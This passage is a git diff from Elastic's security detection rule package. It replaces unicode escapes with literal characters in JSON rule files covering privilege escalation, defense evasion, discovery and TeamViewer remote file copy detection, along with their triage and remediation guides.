"afe6b0eb-dd9d-4922-b08a-1910124d524d", - "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --\u003e Management --\u003e Fleet --\u003e Agent Policies --\u003e Agent Policy with Elastic Defend installed --\u003e Elastic Defend integration --\u003e Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", + "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --> Management --> Fleet --> Agent Policies --> Agent Policy with Elastic Defend installed --> Elastic Defend integration --> Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json index 48ac1c97698..b4ca216e999 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_2.json @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "afe6b0eb-dd9d-4922-b08a-1910124d524d", - "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --\u003e Management --\u003e Fleet --\u003e Agent Policies --\u003e Agent Policy with Elastic Defend installed --\u003e Elastic Defend integration --\u003e Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", + "setup": "This rule leverages `session` fields, which requires that the collection of session data is enabled for Linux operating systems. The following steps should be performed in order to enable session data event collection on a Linux system. ``` Kibana --> Management --> Fleet --> Agent Policies --> Agent Policy with Elastic Defend installed --> Elastic Defend integration --> Enable the \"Collect session data\" box under \"Event Collection\" for \"Linux\" ``` More information on this topic and how to enable session data collection can be found at https://www.elastic.co/blog/secure-your-cloud-with-cloud-workload-protection-in-elastic-security.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json index 1f42ffddaf2..5246c101607 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_3.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json index 4b0b99f8d9a..73c02de61b5 100644 --- a/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json +++ b/packages/security_detection_engine/kibana/security_rule/afe6b0eb-dd9d-4922-b08a-1910124d524d_4.json @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json index 559cf40d302..b8a093741fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_101.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json index 69e23190f16..c1c6303b455 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_102.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json index 5744fc36791..600b9fc7414 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_103.json @@ -45,7 +45,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json index a9224c52fd4..17c4165b443 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_104.json @@ -44,7 +44,7 @@ ], "risk_score": 47, "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json index 1c4eace3297..0911bef5529 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_102.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json index 52dc2d0a053..89fafd00230 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_103.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json index f5c78b3662e..bc9d35630a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json index a4326a09891..979517b882f 100644 --- a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_105.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json b/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json index 1fb22352971..a1c7513992b 100644 --- a/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b0638186-4f12-48ac-83d2-47e686d08e82_1.json @@ -46,7 +46,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -68,7 +68,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json index 0bb7ce92c6c..d43f2c95533 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json +++ b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_1.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json index a0f8a527e18..bb6edeb4436 100644 --- a/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json +++ b/packages/security_detection_engine/kibana/security_rule/b2318c71-5959-469a-a3ce-3a0768e63b9c_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -81,7 +81,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json index 7a08c023197..4f044bcc367 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_104.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json index fa6458260f4..d8c112ffb39 100644 --- a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_105.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy via TeamViewer", - "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\")\n", "references": [ "https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" @@ -53,7 +53,7 @@ ], "risk_score": 47, "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for 